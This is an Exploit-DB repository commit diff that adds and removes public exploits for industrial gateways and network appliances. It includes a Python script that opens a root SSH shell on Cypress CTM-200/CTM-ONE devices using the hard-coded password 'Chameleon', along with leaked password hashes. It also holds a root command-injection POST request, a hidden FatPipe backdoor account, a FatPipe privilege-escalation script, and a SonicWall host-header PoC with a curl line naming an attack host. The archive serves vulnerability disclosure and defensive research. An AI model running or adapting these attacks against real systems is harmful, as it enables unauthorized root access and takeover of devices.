DB: 2021-10-14

28 changes to exploits/shellcodes Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH) Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated) Simple Payroll System 1.0 - SQLi Authentication Bypass Dolibarr ERP/CRM 14.0.1 - Privilege Escalation Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE) Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Budget and Expense Tracker System 1.0 - Arbitrary File Upload FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated) Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF) Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass Simple Issue Tracker System 1.0 - SQLi Authentication Bypass Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS) Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS) Sonicwall SonicOS 7.0 - Host Header Injection Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
2021-10-14 05:02:11 +00:00 · 2021-10-14 05:02:11 +00:00 · 679a62755b
commit 679a62755b
parent 1cf7d7364a
23 changed files with 920 additions and 1075 deletions
--- a/exploits/hardware/remote/50407.py
+++ b/exploits/hardware/remote/50407.py
@ -0,0 +1,117 @@
 # Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
 # Date: 21.09.2021
 # Exploit Author: LiquidWorm
 # Vendor Homepage: https://www.cypress.bc.ca
 #!/usr/bin/env python3
 #
 #
 # Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
 #
 #
 # Vendor: Cypress Solutions Inc.
 # Product web page: https://www.cypress.bc.ca
 # Affected version: CTM-ONE (1.3.6-latest)
 #                   CTM-ONE (1.3.1)
 #                   CTM-ONE (1.1.9)
 #                   CTM200 (2.7.1.5659-latest)
 #                   CTM200 (2.0.5.3356-184)
 #
 # Summary: CTM-200 is the industrial cellular wireless gateway for fixed
 # and mobile applications. The CTM-200 is a Linux based platform powered
 # by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
 # features make the CTM-200 ideal for mobile fleet applications or fixed
 # site office and SCADA communications.
 #
 # CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
 # fixed applications. CTM-ONE is your next generation of gateway for fleet
 # tracking and fixed sites.
 #
 # ======================================================================
 # CTM-200
 # /var/config/passwd:
 # -------------------
 # root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
 # admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
 # nobody:*:65534:65534:nobody:/var:/bin/false
 # daemon:*:65534:65534:daemon:/var:/bin/false
 #
 # /var/config/advanced.ini:
 # -------------------------
 # 0
 # 0
 # Chameleon
 # 0,0,0,0,0,255
 # 0,0,0,0,0,255
 # 0,0,0,0,0,255
 # 0,0,0,0,0,255
 # 0,0,0,0,0,255
 # 0,0,0,0,0,255
 #
 #
 # CTM-ONE
 # /etc/shadow:
 # ------------
 # admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
 # root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
 # daemon:*:16009:0:99999:7:::
 # bin:*:16009:0:99999:7:::
 # sys:*:16009:0:99999:7:::
 # ftp:*:16009:0:99999:7:::
 # nobody:*:16009:0:99999:7:::
 # messagebus:!:16009:0:99999:7:::
 # ======================================================================
 #
 # Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
 # within their Linux distribution image. This weakness can lead to the
 # exposure of resources or functionality to unintended actors, providing
 # attackers with sensitive information including executing arbitrary code.
 #
 # Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
 #            GNU/Linux 2.6.32.25 (arm4tl)
 #            lighttpd/1.4.39
 #            BusyBox v1.24.1
 #            BusyBox v1.15.3
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2021-5686
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
 #
 #
 # 21.09.2021
 #
 import sys
 import paramiko
 bnr='''
 o ┌─┐┌┬┐┌─┐  ┌─┐  ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬  ┬   o
  │ │││││ ┬  ├─┤  ├┬┘│ ││ │ │ └─┐├─┤├┤ │  │
 o └─┘┴ ┴└─┘  ┴ ┴  ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
 '''
 print(bnr)
 if len(sys.argv)<2:
    print('Put an IP.')
    sys.exit()
 adrs=sys.argv[1]##
 unme='root'#admin#
 pwrd='Chameleon'##
 rsh=paramiko.SSHClient()
 rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 rsh.connect(adrs,username=unme,password=pwrd)
 while 1:
    cmnd=input('# ')
    if cmnd=='exit':
        break
    stdin,stdout,stderr=rsh.exec_command(cmnd)
    stdin.close()
    print(str(stdout.read().decode()))
 rsh.close()
--- a/exploits/hardware/remote/50408.txt
+++ b/exploits/hardware/remote/50408.txt
@ -0,0 +1,180 @@
 # Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
 # Date: 21.09.2021
 # Exploit Author: LiquidWorm
 # Vendor Homepage: https://www.cypress.bc.ca
 Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection
 Vendor: Cypress Solutions Inc.
 Product web page: https://www.cypress.bc.ca
 Affected version: 2.7.1.5659
                  2.0.5.3356-184
 Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications.
 The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor.
 Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site
 office and SCADA communications.
 Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection
 vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user
 through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd
 upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to
 the wget command in /usr/bin/cmdmain ELF binary.
 ================================================================================================
 /www/cgi-bin/webif/ctm-config-upgrade.sh:
 -----------------------------------------
 136:    if ! empty "$FORM_install_fw_url"; then
 137:         echo "</pre>"
 138:       echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"
 139:                 cmd upgradefw "$FORM_fw_url"
 140:                 unset FORM_install_fw_url FORM_submit
 141:                 echo "</pre><br />Done."
 142:    fi
 ==================================================================
 cmdmain (ELF):
    memset(&DAT_0003bd1c,0,0x80);
    make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);
    sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
            *(undefined4 *)(iParm2 + 8));
    ctmsys(local_184);
    sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
    iVar3 = ctm_fopen(local_184,"r");
    if (iVar3 == 0) {
      uVar5 = *(undefined4 *)(iParm2 + 8);
      __s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
      goto LAB_0001f4a8;
    }
    ctm_fclose();
    memset(local_184,0,0x100);
    sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
            *(undefined4 *)(iParm2 + 8));
    ctmsys(local_184);
 =================================================================
 cmd (ELF):
              while (sVar1 = strlen(__s2), uVar7 < sVar1) {
                __s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
                __s2 = *ppcVar8;
                uVar7 = uVar7 + 1;
              }
              uStack180 = 0x7273752f;
              uStack176 = 0x6e69622f;
              uStack172 = 0x646d632f;
              uStack168 = 0x6d632f73;
              uStack164 = 0x69616d64;
              uStack160 = 0x6e;
              uStack159 = 0;
              iVar2 = execv((char *)&uStack180,ppcParm2);
 ================================================================================================
 Tested on: GNU/Linux 2.6.32.25 (arm4tl)
           BusyBox v1.15.3
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2021-5687
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php
 21.09.2021
 --
 PoC POST request:
 -----------------
 POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1
 Host: 192.168.1.100
 Connection: keep-alive
 Content-Length: 611
 Cache-Control: max-age=0
 Authorization: Basic YWRtaW46Q2hhbWVsZW9u
 Upgrade-Insecure-Requests: 1
 Origin: http://192.168.1.1
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
 Cookie: style=null
 sec-gpc: 1
 ------WebKitFormBoundaryZlABvwQnpLtpe9mM
 Content-Disposition: form-data; name="submit"
 1
 ------WebKitFormBoundaryZlABvwQnpLtpe9mM
 Content-Disposition: form-data; name="upgradefile"; filename=""
 Content-Type: application/octet-stream
 ------WebKitFormBoundaryZlABvwQnpLtpe9mM
 Content-Disposition: form-data; name="fw_url"
 `id`
 ------WebKitFormBoundaryZlABvwQnpLtpe9mM
 Content-Disposition: form-data; name="install_fw_url"
 Start Firmware Upgrade from URL
 ------WebKitFormBoundaryZlABvwQnpLtpe9mM
 Content-Disposition: form-data; name="pkgurl"
 ------WebKitFormBoundaryZlABvwQnpLtpe9mM--
 Response:
 ---------
 HTTP/1.1 200 OK
 Connection: close
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
 Pragma: no-cache
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "http: //www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http: //www.w3.org/1999/xhtml" lang="en" xml:lang="en">
 ...
 ...
 Firmware Management
 Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
 Saving configuration ...
 downloading firmware image: gid=0(root)/uid=0(root).tar
 found image:
 extracting image files
 Verifying checksum of downloaded firmware image
 Image checksum failed
 OK
 Done.
 ...
 ...
 </div>
 <br />
 <fieldset id="save">
    <legend><strong>Proceed Changes</strong></legend>
    <div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div>
    <ul class="apply">
        <li><a href="config.sh?mode=save&cat=Config&prev=/cgi-bin/webif/ctm-config-upgrade.sh" rel="lightbox" >&raquo; Save Configuration &laquo;</a></li>
    </ul>
 </fieldset>
 </form>
 <hr />
 <div id="footer">
    <h3>X-Wrt</h3>
    <em>End user extensions for OpenWrt</em>
 </div>
 </div> <!-- End #container -->
 </body>
 </html>
--- a/exploits/hardware/webapps/50341.txt
+++ b/exploits/hardware/webapps/50341.txt
@ -1,118 +0,0 @@
 # Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
 # Date: 25.07.2021
 # Exploit Author: LiquidWorm
 # Vendor Homepage: https://www.fatpipeinc.com
 FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access)
 Vendor: FatPipe Networks Inc.
 Product web page: https://www.fatpipeinc.com
 Affected version: WARP / IPVPN / MPVPN
                  10.2.2r38
                  10.2.2r25
                  10.2.2r10
                  10.1.2r60p82
                  10.1.2r60p71
                  10.1.2r60p65
                  10.1.2r60p58s1
                  10.1.2r60p58
                  10.1.2r60p55
                  10.1.2r60p45
                  10.1.2r60p35
                  10.1.2r60p32
                  10.1.2r60p13
                  10.1.2r60p10
                  9.1.2r185
                  9.1.2r180p2
                  9.1.2r165
                  9.1.2r164p5
                  9.1.2r164p4
                  9.1.2r164
                  9.1.2r161p26
                  9.1.2r161p20
                  9.1.2r161p17
                  9.1.2r161p16
                  9.1.2r161p12
                  9.1.2r161p3
                  9.1.2r161p2
                  9.1.2r156
                  9.1.2r150
                  9.1.2r144
                  9.1.2r129
                  7.1.2r39
                  6.1.2r70p75-m
                  6.1.2r70p45-m
                  6.1.2r70p26
                  5.2.0r34
 Summary: FatPipe Networks invented the concept of router-clustering,
 which provides the highest level of reliability, redundancy, and speed
 of Internet traffic for Business Continuity and communications. FatPipe
 WARP achieves fault tolerance for companies by creating an easy method
 of combining two or more Internet connections of any kind over multiple
 ISPs. FatPipe utilizes all paths when the lines are up and running,
 dynamically balancing traffic over the multiple lines, and intelligently
 failing over inbound and outbound IP traffic when ISP services and/or
 components fail.
 FatPipe IPVPN balances load and provides reliability among multiple
 managed and CPE based VPNs as well as dedicated private networks. FatPipe
 IPVPN can also provide you an easy low-cost migration path from private
 line, Frame or Point-to-Point networks. You can aggregate multiple private,
 MPLS and public networks without additional equipment at the provider's
 site.
 FatPipe MPVPN, a patented router clustering device, is an essential part
 of Disaster Recovery and Business Continuity Planning for Virtual Private
 Network (VPN) connectivity. It makes any VPN up to 900% more secure and
 300% times more reliable, redundant and faster. MPVPN can take WANs with
 an uptime of 99.5% or less and make them 99.999988% or higher, providing
 a virtually infallible WAN. MPVPN dynamically balances load over multiple
 lines and ISPs without the need for BGP programming. MPVPN aggregates up
 to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
 you need to keep your VPN up and running despite failures of service, line,
 software, or hardware.
 Desc: The application has a hidden administrative account 'cmuser' that has
 no password and has write access permissions to the device. The user cmuser
 is not visible in Users menu list of the application.
 Tested on: Apache-Coyote/1.1
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2021-5684
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
 30.05.2016
 25.07.2021
 --
 Overview:
 FatPipe Central Manager is a secure web based solution providing a centralized solution
 to manage FatPipe's suite of WAN reliability and optimization products. Central Manager
 allows you to configure, manage and monitor FatPipe's patented MPSec technology at the
 click of a button.
 Central Manager = cmuser.
 Once authenticated, you get admin rights.
 HTTP/1.1 200 OK
 Server: Apache-Coyote/1.1
 Strict-Transport-Security: max-age=31536000
 X-Frame-Options: DENY
 X-Content-Type-Options: nosniff
 X-XSS-Protection: 1; mode=block
 Content-Type: application/json;charset=ISO-8859-1
 Content-Length: 118
 Date: Fri, 06 Aug 2017 16:37:07 GMT
 Connection: close
 {"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}
--- a/exploits/hardware/webapps/50342.py
+++ b/exploits/hardware/webapps/50342.py
@ -1,191 +0,0 @@
 # Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation
 # Date: 25.07.2021
 # Exploit Author: LiquidWorm
 # Vendor Homepage: https://www.fatpipeinc.com
 #!/usr/bin/env python3
 #
 #
 # FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
 #
 #
 # Vendor: FatPipe Networks Inc.
 # Product web page: https://www.fatpipeinc.com
 # Affected version: WARP / IPVPN / MPVPN
 #                   10.2.2r38
 #                   10.2.2r25
 #                   10.2.2r10
 #                   10.1.2r60p82
 #                   10.1.2r60p71
 #                   10.1.2r60p65
 #                   10.1.2r60p58s1
 #                   10.1.2r60p58
 #                   10.1.2r60p55
 #                   10.1.2r60p45
 #                   10.1.2r60p35
 #                   10.1.2r60p32
 #                   10.1.2r60p13
 #                   10.1.2r60p10
 #                   9.1.2r185
 #                   9.1.2r180p2
 #                   9.1.2r165
 #                   9.1.2r164p5
 #                   9.1.2r164p4
 #                   9.1.2r164
 #                   9.1.2r161p26
 #                   9.1.2r161p20
 #                   9.1.2r161p17
 #                   9.1.2r161p16
 #                   9.1.2r161p12
 #                   9.1.2r161p3
 #                   9.1.2r161p2
 #                   9.1.2r156
 #                   9.1.2r150
 #                   9.1.2r144
 #                   9.1.2r129
 #                   7.1.2r39
 #                   6.1.2r70p75-m
 #                   6.1.2r70p45-m
 #                   6.1.2r70p26
 #                   5.2.0r34
 #
 # Summary: FatPipe Networks invented the concept of router-clustering,
 # which provides the highest level of reliability, redundancy, and speed
 # of Internet traffic for Business Continuity and communications. FatPipe
 # WARP achieves fault tolerance for companies by creating an easy method
 # of combining two or more Internet connections of any kind over multiple
 # ISPs. FatPipe utilizes all paths when the lines are up and running,
 # dynamically balancing traffic over the multiple lines, and intelligently
 # failing over inbound and outbound IP traffic when ISP services and/or
 # components fail.
 #
 # FatPipe IPVPN balances load and provides reliability among multiple
 # managed and CPE based VPNs as well as dedicated private networks. FatPipe
 # IPVPN can also provide you an easy low-cost migration path from private
 # line, Frame or Point-to-Point networks. You can aggregate multiple private,
 # MPLS and public networks without additional equipment at the provider's
 # site.
 #
 # FatPipe MPVPN, a patented router clustering device, is an essential part
 # of Disaster Recovery and Business Continuity Planning for Virtual Private
 # Network (VPN) connectivity. It makes any VPN up to 900% more secure and
 # 300% times more reliable, redundant and faster. MPVPN can take WANs with
 # an uptime of 99.5% or less and make them 99.999988% or higher, providing
 # a virtually infallible WAN. MPVPN dynamically balances load over multiple
 # lines and ISPs without the need for BGP programming. MPVPN aggregates up
 # to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
 # you need to keep your VPN up and running despite failures of service, line,
 # software, or hardware.
 #
 # Desc: The application suffers from a privilege escalation vulnerability.
 # A normal user (group USER, 0) can elevate her privileges by sending a HTTP
 # POST request and setting the JSON parameter 'privilege' to integer value
 # '1' gaining administrative  rights (group ADMINISTRATOR, 1).
 #
 # Tested on: Apache-Coyote/1.1
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2021-5685
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
 #
 #
 # 30.05.2016
 # 25.07.2021
 #
 #
 import sys
 import time#######
 import requests################
 requests.packages.urllib3.disable_warnings()
 if len(sys.argv) !=2:
    print
    print("********************************************************")
    print("*                                                      *")
    print("* Privilege escalation from USER to ADMINISTRATOR role *")
    print("*                          in                          *")
    print("*           FatPipe WARP/IPVPN/MPVPN v10.2.2           *")
    print("*                                                      *")
    print("*                     ZSL-2021-5685                    *")
    print("*                                                      *")
    print("********************************************************")
    print("\n[POR] Usage: ./escalator.py [IP]")
    sys.exit()
 ajpi=sys.argv[1]
 print
 juzer=raw_input("[UNE] Username: ")
 pasvord=raw_input("[UNE] Password: ")
 sesija=requests.session()
 logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
 hederi={'Sec-Ch-Ua'       :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
        'Accept'          :'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With':'XMLHttpRequest',
        'Sec-Ch-Ua-Mobile':'?0',
        'User-Agent'      :'Fatnet/1.b',
        'Content-Type'    :'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin'          :'https://'+ajpi,
        'Sec-Fetch-Site'  :'same-origin',
        'Sec-Fetch-Mode'  :'cors',
        'Sec-Fetch-Dest'  :'empty',
        'Referer'         :'https://'+ajpi+'/fpui/dataCollectionServlet',
        'Accept-Encoding' :'gzip, deflate',
        'Accept-Language' :'en-US,en;q=0.9',
        'Connection'      :'close'}
 juarel1='https://'+ajpi+'/fpui/loginServlet'
 alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
 if not 'success' in alo.text:
    print('[GRE] Login error.')
    sys.exit()
 else:
    print('[POR] Authentication successful.')
 print('[POR] Climbing the ladder...')
 sluba='''
 ||    ||       .--._
 ||====|| __   '---._)
 ||    ||"")\   Q Q )
 ||====|| =_/   o  /
 ||    || | \_.-;-'-,._
 ||====|| |  '  o---o   )
 ||    ||  \   /H __H\  /
 ||====||   '-' \"")\/  |
 ||    ||     _ |_='-)_/
 ||====||    /  '.    )
 ||    ||   /         /
 ||====||  |___/\|   /
 ||    ||   |_|  |   |
 ||====||  /  )  \\   \\
 ||    || (__/    \___\\
 ||====||           \_\\
 ||    ||           /  )
 ||====||          (__/
 '''
 for k in sluba:
    sys.stdout.write(k)
    sys.stdout.flush()
    time.sleep(0.01)
 juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
 posta={
 'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
 }
 stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
 if not 'true' in stanje.text:
    print('\n[GRE] Something\'s fishy!')
    sys.exit()
 else:
    print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
    sys.exit()
--- a/exploits/hardware/webapps/50414.txt
+++ b/exploits/hardware/webapps/50414.txt
@ -0,0 +1,228 @@
 # Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection
 # Google Dork: inurl:"auth.html" intitle:"SonicWall"
 #                        intitle:"SonicWall Analyzer Login"
 # Discovered Date: 03/09/2020
 # Reported Date: 07/09/2020
 # Exploit Author: Ramikan
 # Vendor Homepage:sonicwall.com
 # Affected Devices: All SonicWall Next Gen 6 Devices
 # Tested On: SonicWall NAS 6.2.5
 # Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3
 # Fixed Version:Gen6 firmware 6.5.4.8-89n
 # CVE : CVE-2021-20031
 # CVSS v3:5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
 # Category:Hardware, Web Apps
 # Reference : https://github.com/Ramikan/Vulnerabilities/
 *************************************************************************************************************************************
 Vulnerability 1: Host Header Injection
 *************************************************************************************************************************************
 Description:
 A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
 An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
 Impact:
 Host Header changed to different domain (fakedomain.com).
 Fakedomain.com can be found in two lines in the HTTP response, below are the two lines.
 var jumpURL = "https://fakedomain.com/auth.html";
 ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
 *************************************************************************************************************************************
 Normal Request
 *************************************************************************************************************************************
 GET / HTTP/1.1
 Host: 192.168.10.1
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Upgrade-Insecure-Requests: 1
 Cache-Control: max-age=0
 *************************************************************************************************************************************
 Normal Response
 *************************************************************************************************************************************
 HTTP/1.0 200 OK
 Server: SonicWALL
 Expires: -1
 Cache-Control: no-cache
 Content-type: text/html; charset=UTF-8;
 X-Content-Type-Options: nosniff
 X-XSS-Protection: 1; mode=block
 X-Frame-Options: SAMEORIGIN
 Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
 <html>
 ++++++++++++++++++snipped+++++++++++++++++++++++
 </head>
 <body class="login_bg">
 	<div class="login_outer">
 		<div class="login_inner">
 			<div class="vgap48"></div>
 			<div class="login_logo">
 				<img src="logo_sw.png">
 			</div>
 			<div class="login_prodname">
 				Network Security Appliance
 			</div>
 			<div class="vgap48"></div>
 			<div class="login_msg_header">
 				Please be patient as you are being re-directed to <a href="https://192.168.10.1/auth.html" target="_top">a secure login page</a>
 			</div>
 			<div class="vgap24"></div>
 		</div>
 	</div>
 </body>
 </html>
 *************************************************************************************************************************************
 POC
 *************************************************************************************************************************************
 Host Header changed to different domain (fakedomain.com).
 Fakedomain.com can be found in two lines in the response, below are the two lines.
 var jumpURL = "https://fakedomain.com/auth.html";
 ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
 *************************************************************************************************************************************
 Request:
 *************************************************************************************************************************************
 GET / HTTP/1.1
 Host: fakedomain.com
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Upgrade-Insecure-Requests: 1
 Connection: close
 Cookie: temp=
 *************************************************************************************************************************************
 Response:
 *************************************************************************************************************************************
 HTTP/1.0 200 OK
 Server: SonicWALL
 Expires: -1
 Cache-Control: no-cache
 Content-type: text/html; charset=UTF-8;
 X-Content-Type-Options: nosniff
 X-XSS-Protection: 1; mode=block
 X-Frame-Options: SAMEORIGIN
 Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
 <html>
 <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 <meta http-equiv="Content-Type" content="text/html">
 <title>Document Moved</title>
 <meta name="id" content="docJump" >
 <link rel=stylesheet href="swl_styles-6.2.5-2464327966.css" TYPE="text/css">
 <link rel=stylesheet href="swl_login-6.2.5-2193764341.css" TYPE="text/css">
 <script type="text/JavaScript">
 var resetSecureFlag = false;
 setTimeout("goJump();", 1000);
 function goJump() {
 	var jumpURL = "https://fakedomain.com/auth.html";
 	var jumpProt = jumpURL.substr(0,6).toLowerCase();
 	var ix;
 	if (jumpProt.substr(0,4) == "http" && (ix = jumpProt.indexOf(":")) != -1) {
 		jumpProt = jumpProt.substr(0,ix+1);
 		if (location.protocol.toLowerCase() != jumpProt) {
 			window.opener = null;
 			top.opener = null;
 		}
 	}
 	if (resetSecureFlag) {
 		var sessId = getCookie("SessId");
 		var pageSeed = swlStore.get("PageSeed", {isGlobal: true});
 		if (sessId) { setCookieExt("SessId", sessId, { strictSameSite: true }); }
 		if (pageSeed) { swlStore.set("PageSeed", pageSeed, {isGlobal: true}); }
 	}
 	top.location.href = jumpURL;
 }
 function setCookie(key, value) {
  var argv = setCookie.arguments;
  var argc = setCookie.arguments.length;
  var expires = (argc > 2) ? argv[2] : null;
  var path = (argc > 3) ? argv[3] : null;
  var domain = (argc > 4) ? argv[4] : null;
  var secure = (argc > 5) ? argv[5] : false;
  document.cookie = key + "=" + escape (value) +
 	((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
 	((path == null) ? "" : ("; path=" + path)) +
 	((domain == null) ? "" : ("; domain=" + domain)) +
 	((secure == true) ? "; secure" : "");
 }
 function getCookie(key) {
 	if (document.cookie.length) {
 		var cookies = ' ' + document.cookie;
 		var start = cookies.indexOf(' ' + key + '=');
 		if (start == -1) {
 			return null;
 		}
 		var end = cookies.indexOf(";", start);
 		if (end == -1) {
 			end = cookies.length;
 		}
 		end -= start;
 		var cookie = cookies.substr(start,end);
 		return unescape(cookie.substr(cookie.indexOf('=') + 1, cookie.length - cookie.indexOf('=') + 1));
 	} else {
 		return null;
 	}
 }
 </script>
 </head>
 <body class="login_bg">
 	<div class="login_outer">
 		<div class="login_inner">
 			<div class="vgap48"></div>
 			<div class="login_logo">
 				<img src="logo_sw.png">
 			</div>
 			<div class="login_prodname">
 				Network Security Appliance
 			</div>
 			<div class="vgap48"></div>
 			<div class="login_msg_header">
 				Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
 			</div>
 			<div class="vgap24"></div>
 		</div>
 	</div>
 </body>
 </html>
 The redirection is happening to https://fakedomain.com/auth.html.
 *************************************************************************************************************************************
 Attack Vector:
 *************************************************************************************************************************************
 Can be used for domain fronting.
 curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device"
 *************************************************************************************************************************************
 Vendor Response:
 *************************************************************************************************************************************
